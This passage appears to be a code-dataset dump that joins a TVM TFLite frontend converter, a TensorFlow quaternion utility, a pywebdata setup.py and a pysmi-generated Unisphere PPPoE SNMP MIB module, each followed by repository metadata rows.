from tflite.MulOptions import MulOptions
from tflite.DivOptions import DivOptions
from tflite.BuiltinOptions import BuiltinOptions
from tflite.ActivationFunctionType import ActivationFunctionType
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 2, "input tensors length should be 2"
lhs_tensor = input_tensors[0]
lhs_expr = self.get_expr(lhs_tensor.tensor_idx)
rhs_tensor = input_tensors[1]
if self.has_expr(rhs_tensor.tensor_idx):
# In most cases, we can assume that TOCO fuses elemwise operators
# with constants - it means both will be tensors.
rhs_expr = self.get_expr(rhs_tensor.tensor_idx)
else:
# However, in some corner cases, the elemwise operator is not fused,
# we can receive as constant.
rhs_type_str = self.get_tensor_type_str(rhs_tensor.tensor.Type())
rhs_expr = self.exp_tab.new_const(self.get_tensor_value(rhs_tensor),
dtype=rhs_type_str)
out = relay_op(lhs_expr, rhs_expr)
# Options (fused_activation_function)
options = None
if op.BuiltinOptionsType() == BuiltinOptions.AddOptions:
options = AddOptions()
elif op.BuiltinOptionsType() == BuiltinOptions.SubOptions:
options = SubOptions()
elif op.BuiltinOptionsType() == BuiltinOptions.MulOptions:
options = MulOptions()
elif op.BuiltinOptionsType() == BuiltinOptions.DivOptions:
options = DivOptions()
if options is not None:
op_options = op.BuiltinOptions()
options.Init(op_options.Bytes, op_options.Pos)
fused_activation_fn = options.FusedActivationFunction()
# if we have activation fn
if fused_activation_fn != ActivationFunctionType.NONE:
out = self.convert_fused_activation_function(out, fused_activation_fn)
return out
def convert_add(self, op):
"""Convert TFLite ADD"""
return self._convert_elemwise(_op.add, op)
def convert_sub(self, op):
"""Convert TFLite SUB"""
return self._convert_elemwise(_op.subtract, op)
def convert_mul(self, op):
"""Convert TFLite MUL"""
return self._convert_elemwise(_op.multiply, op)
def convert_div(self, op):
"""Convert TFLite DIV"""
return self._convert_elemwise(_op.divide, op)
def convert_pow(self, op):
return self._convert_elemwise(_op.power, op)
def convert_maximum(self, op):
return self._convert_elemwise(_op.maximum, op)
def convert_minimum(self, op):
return self._convert_elemwise(_op.minimum, op)
def convert_fully_connected(self, op):
"""Convert TFLite fully connected"""
try:
from tflite.Operator import Operator
from tflite.FullyConnectedOptions import FullyConnectedOptions
from tflite.BuiltinOptions import BuiltinOptions
from tflite.TensorType import TensorType
from tflite.ActivationFunctionType import ActivationFunctionType
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) >= 2, "input tensors length should be >= 2"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
weight_tensor = input_tensors[1]
input_tensor_shape = input_tensor.tensor.ShapeAsNumpy()
weight_tensor_shape = weight_tensor.tensor.ShapeAsNumpy()
# reshape input tensor from N H W C to N H*W*C
input_size_per_batch = 1
for s in range(1, len(input_tensor_shape)):
input_size_per_batch *= input_tensor_shape[s]
assert input_size_per_batch == weight_tensor_shape[1], \
"input size and weight size are mismatched"
target_shape = tuple((input_tensor_shape[0], input_size_per_batch))
in_expr = self.get_expr(input_tensor_idx)
in_expr = _op.reshape(in_expr, target_shape)
assert op.BuiltinOptionsType() == BuiltinOptions.FullyConnectedOptions
op_options = op.BuiltinOptions()
fully_connected_options = FullyConnectedOptions()
fully_connected_options.Init(op_options.Bytes, op_options.Pos)
fused_activation_fn = fully_connected_options.FusedActivationFunction()
# weight tensor type should be UINT8 (quantization) or FLOAT32
weight_tensor_type = weight_tensor.tensor.Type()
assert weight_tensor_type in (TensorType.UINT8, TensorType.FLOAT32)
weight_tensor_type_str = self.get_tensor_type_str(weight_tensor_type)
weight_value = self.get_tensor_value(weight_tensor)
weight_expr = self.exp_tab.new_const(weight_value, dtype=weight_tensor_type_str)
out = _op.nn.dense(in_expr, weight_expr)
# if we have bias
if len(input_tensors) == 3:
bias_tensor = input_tensors[2]
bias_tensor_type = bias_tensor.tensor.Type()
# bias tensor type should be INT32 (quantization) or FLOAT32
assert bias_tensor_type in (TensorType.INT32, TensorType.FLOAT32)
bias_tensor_type_str = self.get_tensor_type_str(bias_tensor_type)
bias_expr = self.exp_tab.new_const(self.get_tensor_value(bias_tensor),
dtype=bias_tensor_type_str)
out = _op.nn.bias_add(out, bias_expr)
# If we have fused activations
if fused_activation_fn != ActivationFunctionType.NONE:
out = self.convert_fused_activation_function(out, fused_activation_fn)
return out
def convert_squeeze(self, op):
"""Convert TFLite squeeze"""
try:
from tflite.BuiltinOptions import BuiltinOptions
from tflite.Operator import Operator
from tflite.SqueezeOptions import SqueezeOptions
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
output_tensors = self.get_output_tensors(op)
assert len(input_tensors) == 1, "input tensors length should be 1"
assert len(output_tensors) == 1, "output tensors length should be 1"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
assert op.BuiltinOptionsType() == BuiltinOptions.SqueezeOptions
op_options = op.BuiltinOptions()
squeeze_options = SqueezeOptions()
squeeze_options.Init(op_options.Bytes, op_options.Pos)
squeeze_axis = squeeze_options.SqueezeDimsAsNumpy()
in_expr = self.get_expr(input_tensor_idx)
out = _op.squeeze(in_expr, axis=tuple(squeeze_axis))
return out
def convert_fused_activation_function(self, in_expr, fused_activation_fn):
"""Convert TFLite fused activation function"""
try:
from tflite.ActivationFunctionType import ActivationFunctionType
except ImportError:
raise ImportError("The tflite package must be installed")
assert fused_activation_fn != ActivationFunctionType.NONE
if fused_activation_fn == ActivationFunctionType.RELU6:
return _op.clip(in_expr, a_min=0, a_max=6)
if fused_activation_fn == ActivationFunctionType.RELU:
return _op.nn.relu(in_expr)
if fused_activation_fn == ActivationFunctionType.RELU_N1_TO_1:
return _op.clip(in_expr, a_min=-1, a_max=1)
if fused_activation_fn == ActivationFunctionType.TANH:
return _op.tanh(in_expr)
fused_activation_fn_str = self.activation_fn_type[fused_activation_fn]
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend TFLite.'.format(fused_activation_fn_str))
def convert_conv(self, op, conv_type):
"""convolution implementation."""
try:
from tflite.BuiltinOptions import BuiltinOptions
from tflite.ActivationFunctionType import ActivationFunctionType
from tflite.TensorType import TensorType
from tflite.Operator import Operator
from tflite.Conv2DOptions import Conv2DOptions
from tflite.DepthwiseConv2DOptions import DepthwiseConv2DOptions
from tflite.Padding import Padding
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) >= 2, "input tensors length should be >= 2"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
weight_tensor = input_tensors[1]
is_depthwise_conv = False
if conv_type == 'conv2d':
assert op.BuiltinOptionsType() == BuiltinOptions.Conv2DOptions
op_options = op.BuiltinOptions()
conv_options = Conv2DOptions()
conv_options.Init(op_options.Bytes, op_options.Pos)
elif conv_type == 'depthwise':
is_depthwise_conv = True
assert op.BuiltinOptionsType() == BuiltinOptions.DepthwiseConv2DOptions
op_options = op.BuiltinOptions()
conv_options = DepthwiseConv2DOptions()
conv_options.Init(op_options.Bytes, op_options.Pos)
depth_multiplier = conv_options.DepthMultiplier()
assert depth_multiplier == 1, "TF frontend transforms it to be 1 regardless of what " \
"original value is set to 0.25, 0.5 or anything else"
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend TFLite.'.format(conv_type))
stride_h = conv_options.StrideH()
stride_w = conv_options.StrideW()
dilation_h = conv_options.DilationHFactor()
dilation_w = conv_options.DilationWFactor()
padding = conv_options.Padding()
fused_activation_fn = conv_options.FusedActivationFunction()
_, input_h, input_w, _ = input_tensor.tensor.ShapeAsNumpy()
if is_depthwise_conv:
multiplier, kernel_h, kernel_w, in_channels = weight_tensor.tensor.ShapeAsNumpy()
assert multiplier == depth_multiplier
else:
output_channels, kernel_h, kernel_w, _ = weight_tensor.tensor.ShapeAsNumpy()
dilated_kernel_h = dilation_h * (kernel_h - 1) + 1
dilated_kernel_w = dilation_w * (kernel_w - 1) + 1
params = {'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'dilation': [dilation_h, dilation_w],
'padding': [0, 0],
'data_layout': 'NHWC'}
if is_depthwise_conv:
params['channels'] = int(in_channels * multiplier)
params['groups'] = int(in_channels)
params['kernel_layout'] = 'HWOI'
else:
params['channels'] = int(output_channels)
params['kernel_layout'] = 'HWIO'
# weight tensor type should be UINT8 (quantization) or FLOAT32
weight_tensor_type = weight_tensor.tensor.Type()
assert weight_tensor_type in (TensorType.UINT8, TensorType.FLOAT32)
weight_tensor_type_str = self.get_tensor_type_str(weight_tensor_type)
in_expr = self.get_expr(input_tensor_idx)
weight_value = self.get_tensor_value(weight_tensor)
# TFLite is OC/M KH KW IC, we require KH KW IC OC/M
# M means multiplier in depthwise convolution
weight_value = weight_value.transpose((1, 2, 3, 0))
weight_expr = self.exp_tab.new_const(weight_value, dtype=weight_tensor_type_str)
if padding == Padding.VALID:
pass
elif padding == Padding.SAME:
pad_top, pad_bottom = get_pad_value(input_h, dilated_kernel_h, stride_h)
pad_left, pad_right = get_pad_value(input_w, dilated_kernel_w, stride_w)
in_expr = _op.nn.pad(data=in_expr, pad_width=((0, 0),
(pad_top, pad_bottom),
(pad_left, pad_right),
(0, 0)))
else:
raise tvm.error.OpAttributeUnimplemented(
'Padding format {} is not supported for operator Conv.'.format(padding))
out = _op.nn.conv2d(data=in_expr, weight=weight_expr, **params)
# if we have bias
if len(input_tensors) == 3:
bias_tensor = input_tensors[2]
bias_tensor_type = bias_tensor.tensor.Type()
# bias tensor type should be INT32 (quantization) or FLOAT32
assert bias_tensor_type in (TensorType.INT32, TensorType.FLOAT32)
bias_tensor_type_str = self.get_tensor_type_str(bias_tensor_type)
bias_expr = self.exp_tab.new_const(self.get_tensor_value(bias_tensor),
dtype=bias_tensor_type_str)
channel_axis = 3
out = _op.nn.bias_add(out, bias_expr, axis=channel_axis)
# If we have fused activations
if fused_activation_fn != ActivationFunctionType.NONE:
out = self.convert_fused_activation_function(out, fused_activation_fn)
return out
def convert_pool2d(self, op, pool_type):
"""pool2d implementation."""
try:
from tflite.BuiltinOptions import BuiltinOptions
from tflite.ActivationFunctionType import ActivationFunctionType
from tflite.Operator import Operator
from tflite.Pool2DOptions import Pool2DOptions
from tflite.Padding import Padding
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 1, "input tensors length should be 1"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
assert op.BuiltinOptionsType() == BuiltinOptions.Pool2DOptions
op_options = op.BuiltinOptions()
pool2d_options = Pool2DOptions()
pool2d_options.Init(op_options.Bytes, op_options.Pos)
stride_h = pool2d_options.StrideH()
stride_w = pool2d_options.StrideW()
padding = pool2d_options.Padding()
filter_h = pool2d_options.FilterHeight()
filter_w = pool2d_options.FilterWidth()
fused_activation_fn = pool2d_options.FusedActivationFunction()
params = {'pool_size': (filter_h, filter_w),
'strides': (stride_h, stride_w),
'padding': [0, 0],
'layout': 'NHWC'}
in_expr = self.get_expr(input_tensor_idx)
_, input_h, input_w, _ = input_tensor.tensor.ShapeAsNumpy()
if padding == Padding.VALID:
pass
elif padding == Padding.SAME:
pad_top, pad_bottom = get_pad_value(input_h, filter_h, stride_h)
pad_left, pad_right = get_pad_value(input_w, filter_w, stride_w)
params['padding'] = [pad_top, pad_left, pad_bottom, pad_right]
else:
raise tvm.error.OpAttributeUnimplemented(
'Padding format {} for operator Pool2D is not supported.'.format(padding))
if pool_type == "average":
out = _op.nn.avg_pool2d(in_expr, **params)
elif pool_type == "max":
out = _op.nn.max_pool2d(in_expr, **params)
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend TFLite.'.format(pool_type + ' pool'))
# If we have fused activations
if fused_activation_fn != ActivationFunctionType.NONE:
out = self.convert_fused_activation_function(out, fused_activation_fn)
return out
def convert_pad(self, op):
"""Convert TFLite PAD"""
try:
from tflite.Operator import Operator
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 2, "input tensors length should be 2"
# TFLite only support CONSTANT mode and does not support constant_values parameter.
# tensor
input_tensor = input_tensors[0]
in_expr = self.get_expr(input_tensor.tensor_idx)
# paddings
pad_list = self.get_tensor_value(input_tensors[1])
# convert list of lists to tuple of tuples
paddings = tuple(tuple(l) for l in pad_list)
# Use default pad_value 0 because TFLite does not support constant_values parameter
out = _op.nn.pad(in_expr, paddings)
return out
def get_expr(self, input_tensor_idx):
return self.exp_tab.get_expr(get_tensor_name(self.subgraph, input_tensor_idx))
def has_expr(self, input_tensor_idx):
return self.exp_tab.has_expr(get_tensor_name(self.subgraph, input_tensor_idx))
def build_str_map(obj):
"""Build string map of TFLite enum int value
Parameters
----------
obj:
TFLite class which contains enum int value, such as BuiltInOptions
Returns
-------
String representation map of TFLite class enum int value
"""
ret = {}
for field_name in dir(obj):
if not field_name.startswith('_'):
field_value = getattr(obj, field_name)
if isinstance(field_value, int):
ret[field_value] = field_name
return ret
# SAME padding: https://www.tensorflow.org/api_guides/python/nn
def get_pad_value(data, kernel, stride):
"""Get the pad tuple of value for SAME padding
Parameters
----------
data:
1D input data
kernel:
1D input kernel
stride:
1D input stride
Returns
-------
pad tuple of value
"""
out = int(math.ceil(float(data) / float(stride)))
pad = max(0, (out - 1) * stride + kernel - data)
pad_before = pad // 2
pad_after = pad - pad_before
return pad_before, pad_after
def get_tensor_name(subgraph, tensor_idx):
"""Get the tensor name.
Parameters
----------
subgraph:
tflite.Subgraph.Subgraph
tensor:
tensor index in subgraph
Returns
-------
tensor name in UTF-8 encoding
"""
return subgraph.Tensors(tensor_idx).Name().decode("utf-8")
def from_tflite(model, shape_dict, dtype_dict):
"""Convert from tflite model into compatible relay Function.
Parameters
----------
model:
tflite.Model.Model
shape_dict : dict of str to int list/tuple
Input shapes of the model.
dtype_dict : dict of str to str
Input types of the model.
Returns
-------
mod : tvm.relay.Module
The relay module for compilation.
params : dict of str to tvm.NDArray
The parameter dict to be used by relay
"""
try:
import tflite.Model
import tflite.SubGraph
import tflite.BuiltinOperator
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(model, tflite.Model.Model)
# keep the same as tflite
assert model.SubgraphsLength() == 1, "only support one subgraph (main subgraph)"
subgraph = model.Subgraphs(0)
# model inputs / outputs
model_inputs = subgraph.InputsAsNumpy()
model_outputs = subgraph.OutputsAsNumpy()
exp_tab = ExprTable()
for model_input in model_inputs:
model_input_name = get_tensor_name(subgraph, model_input)
shape = shape_dict[model_input_name] if model_input_name in shape_dict else None
dtype = dtype_dict[model_input_name] if model_input_name in dtype_dict else "float32"
exp_tab.set_expr(model_input_name, _expr.var(model_input_name, shape=shape, dtype=dtype))
# op code in model
op_converter = OperatorConverter(model, subgraph, exp_tab)
op_converter.check_unsupported_ops()
op_converter.convert_op_to_relay()
# params and outputs
params = {k:_nd.array(np.array(v)) for k, v in exp_tab.params.items()}
outputs = [exp_tab.get_expr(get_tensor_name(subgraph, i)) for i in model_outputs]
outputs = outputs[0] if len(outputs) == 1 else _expr.Tuple(outputs)
func = _expr.Function(ir_pass.free_vars(outputs), outputs)
return _module.Module.from_expr(func), params
| 40.791523 | 99 | 0.655444 |
acfa956ad21a59fa775c07f29c720cd610ba3027 | 5,995 | py | Python | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 153 | 2018-11-26T18:35:25.000Z | 2022-03-25T07:34:17.000Z | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 10 | 2019-04-24T09:56:27.000Z | 2021-03-29T13:36:19.000Z | 2Dpm/util/quaternion.py | Sirish07/2D_projection_matching | 11c8ea81e3cbf5ecd3daba602cde0b7a9efcc15d | [
"MIT"
] | 16 | 2019-01-23T15:23:53.000Z | 2021-12-08T21:27:44.000Z | # Copyright Philipp Jund (jundp@cs.uni-freiburg.de) and Eldar Insafutdinov, 2018.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Website: https://github.com/PhilJd/tf-quaternion
import tensorflow as tf
import numpy as np
def validate_shape(x):
"""Raise a value error if x.shape ist not (..., 4)."""
error_msg = ("Can't create a quaternion from a tensor with shape {}."
"The last dimension must be 4.")
# Check is performed during graph construction. If your dimension
# is unknown, tf.reshape(x, (-1, 4)) might work.
if x.shape[-1] != 4:
raise ValueError(error_msg.format(x.shape))
def vector3d_to_quaternion(x):
"""Convert a tensor of 3D vectors to a quaternion.
Prepends a 0 to the last dimension, i.e. [[1,2,3]] -> [[0,1,2,3]].
Args:
x: A `tf.Tensor` of rank R, the last dimension must be 3.
Returns:
A `Quaternion` of Rank R with the last dimension being 4.
Raises:
ValueError, if the last dimension of x is not 3.
"""
x = tf.convert_to_tensor(x)
if x.shape[-1] != 3:
raise ValueError("The last dimension of x must be 3.")
return tf.pad(x, (len(x.shape) - 1) * [[0, 0]] + [[1, 0]])
def _prepare_tensor_for_div_mul(x):
"""Prepare the tensor x for division/multiplication.
This function
a) converts x to a tensor if necessary,
b) prepends a 0 in the last dimension if the last dimension is 3,
c) validates the type and shape.
"""
x = tf.convert_to_tensor(x)
if x.shape[-1] == 3:
x = vector3d_to_quaternion(x)
validate_shape(x)
return x
def quaternion_multiply(a, b):
"""Multiply two quaternion tensors.
Note that this differs from tf.multiply and is not commutative.
Args:
a, b: A `tf.Tensor` with shape (..., 4).
Returns:
A `Quaternion`.
"""
a = _prepare_tensor_for_div_mul(a)
b = _prepare_tensor_for_div_mul(b)
w1, x1, y1, z1 = tf.unstack(a, axis=-1)
w2, x2, y2, z2 = tf.unstack(b, axis=-1)
w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2
x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2
y = w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2
z = w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2
return tf.stack((w, x, y, z), axis=-1)
def quaternion_conjugate(q):
"""Compute the conjugate of q, i.e. [q.w, -q.x, -q.y, -q.z]."""
return tf.multiply(q, [1.0, -1.0, -1.0, -1.0])
def quaternion_normalise(q):
"""Normalises quaternion to use as a rotation quaternion
Args:
q: [..., 4] quaternion
Returns:
q / ||q||_2
"""
return q / tf.norm(q, axis=-1, keepdims=True)
def quaternion_rotate(pc, q, inverse=False):
"""rotates a set of 3D points by a rotation,
represented as a quaternion
Args:
pc: [B,N,3] point cloud
q: [B,4] rotation quaternion
Returns:
q * pc * q'
"""
q_norm = tf.expand_dims(tf.norm(q, axis=-1), axis=-1)
q /= q_norm
q = tf.expand_dims(q, axis=1) # [B,1,4]
q_ = quaternion_conjugate(q)
qmul = quaternion_multiply
if not inverse:
wxyz = qmul(qmul(q, pc), q_) # [B,N,4]
else:
wxyz = qmul(qmul(q_, pc), q) # [B,N,4]
if len(wxyz.shape) == 2: # bug with batch size of 1
wxyz = tf.expand_dims(wxyz, axis=0)
xyz = wxyz[:, :, 1:4] # [B,N,3]
return xyz
def normalized(q):
q_norm = tf.expand_dims(tf.norm(q, axis=-1), axis=-1)
q /= q_norm
return q
def as_rotation_matrix(q):
"""Calculate the corresponding rotation matrix.
See
http://www.euclideanspace.com/maths/geometry/rotations/conversions/quaternionToMatrix/
Returns:
A `tf.Tensor` with R+1 dimensions and
shape [d_1, ..., d_(R-1), 3, 3], the rotation matrix
"""
# helper functions
def diag(a, b): # computes the diagonal entries, 1 - 2*a**2 - 2*b**2
return 1 - 2 * tf.pow(a, 2) - 2 * tf.pow(b, 2)
def tr_add(a, b, c, d): # computes triangle entries with addition
return 2 * a * b + 2 * c * d
def tr_sub(a, b, c, d): # computes triangle entries with subtraction
return 2 * a * b - 2 * c * d
w, x, y, z = tf.unstack(normalized(q), axis=-1)
m = [[diag(y, z), tr_sub(x, y, z, w), tr_add(x, z, y, w)],
[tr_add(x, y, z, w), diag(x, z), tr_sub(y, z, x, w)],
[tr_sub(x, z, y, w), tr_add(y, z, x, w), diag(x, y)]]
return tf.stack([tf.stack(m[i], axis=-1) for i in range(3)], axis=-2)
def from_rotation_matrix(mtr):
"""
See
http://www.euclideanspace.com/maths/geometry/rotations/conversions/matrixToQuaternion/
"""
mtr = tf.convert_to_tensor(mtr)
def m(j, i):
shape = mtr.shape.as_list()
begin = [0 for _ in range(len(shape))]
begin[-2] = j
begin[-1] = i
size = [s for s in shape]
size[-2] = 1
size[-1] = 1
v = tf.slice(mtr, begin=begin, size=size)
v = tf.squeeze(v, axis=[-1, -2])
return v
w = tf.sqrt(1.0 + m(0, 0) + m(1, 1) + m(2, 2)) / 2
x = (m(2, 1) - m(1, 2)) / (4 * w)
y = (m(0, 2) - m(2, 0)) / (4 * w)
z = (m(1, 0) - m(0, 1)) / (4 * w)
q = tf.stack([w, x, y, z], axis=-1)
return q
def quaternion_multiply_np(a, b):
w1, x1, y1, z1 = a
w2, x2, y2, z2 = b
w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2
x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2
y = w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2
z = w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2
return np.array([w, x, y, z]) | 32.231183 | 90 | 0.578315 |
acfa9618263bdbfeaf6b9f106f6d545248a3a765 | 759 | py | Python | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | null | null | null | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | 8 | 2015-09-07T17:48:15.000Z | 2016-01-31T19:56:28.000Z | setup.py | pywebdata/pywebdata | 74fb3d5adcdb549008ee04de5ae284066c0db362 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='pywebdata',
version='0.1.0',
description="all the web's data, one api",
long_description=readme(),
url='http://github.com/drousis/pywebdata',
author='Damon Rousis',
author_email='admin@damonology.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7'
],
packages=find_packages(),
package_data={
'pywebdata': ['services/README']
},
install_requires=['requests'],
zip_safe=False,
test_suite='nose.collector',
tests_require=['nose']
) | 26.172414 | 49 | 0.619236 |
acfa976ee1e91c4c150ae7703469a144b772d3d4 | 29,040 | py | Python | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/Unisphere-Data-PPPOE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Unisphere-Data-PPPOE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Unisphere-Data-PPPOE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:25:13 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint")
InterfaceIndexOrZero, InterfaceIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndexOrZero", "InterfaceIndex")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress, Integer32, Counter32, ObjectIdentity, ModuleIdentity, iso, Counter64, MibIdentifier, Unsigned32, Gauge32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress", "Integer32", "Counter32", "ObjectIdentity", "ModuleIdentity", "iso", "Counter64", "MibIdentifier", "Unsigned32", "Gauge32", "NotificationType")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
usDataMibs, = mibBuilder.importSymbols("Unisphere-Data-MIBs", "usDataMibs")
UsdNextIfIndex, UsdEnable = mibBuilder.importSymbols("Unisphere-Data-TC", "UsdNextIfIndex", "UsdEnable")
usdPPPoEMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18))
usdPPPoEMIB.setRevisions(('2002-08-16 21:46', '2001-06-19 14:27', '2001-03-21 15:00', '2001-02-12 00:00', '2000-10-25 00:00', '1999-05-13 00:00',))
if mibBuilder.loadTexts: usdPPPoEMIB.setLastUpdated('200208162146Z')
if mibBuilder.loadTexts: usdPPPoEMIB.setOrganization('Juniper Networks, Inc.')
usdPPPoEObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1))
usdPPPoEIfLayer = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1))
usdPPPoESubIfLayer = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2))
usdPPPoEGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 3))
usdPPPoEProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4))
usdPPPoESummary = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5))
usdPPPoENextIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 1), UsdNextIfIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoENextIfIndex.setStatus('current')
usdPPPoEIfTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2), )
if mibBuilder.loadTexts: usdPPPoEIfTable.setStatus('current')
usdPPPoEIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"))
if mibBuilder.loadTexts: usdPPPoEIfEntry.setStatus('current')
usdPPPoEIfIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 1), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfIfIndex.setStatus('current')
usdPPPoEIfMaxNumSessions = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65335))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfMaxNumSessions.setStatus('current')
usdPPPoEIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfRowStatus.setStatus('current')
usdPPPoEIfLowerIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 4), InterfaceIndexOrZero()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfLowerIfIndex.setStatus('current')
usdPPPoEIfAcName = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfAcName.setStatus('current')
usdPPPoEIfDupProtect = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 6), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfDupProtect.setStatus('current')
usdPPPoEIfPADIFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 7), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfPADIFlag.setStatus('current')
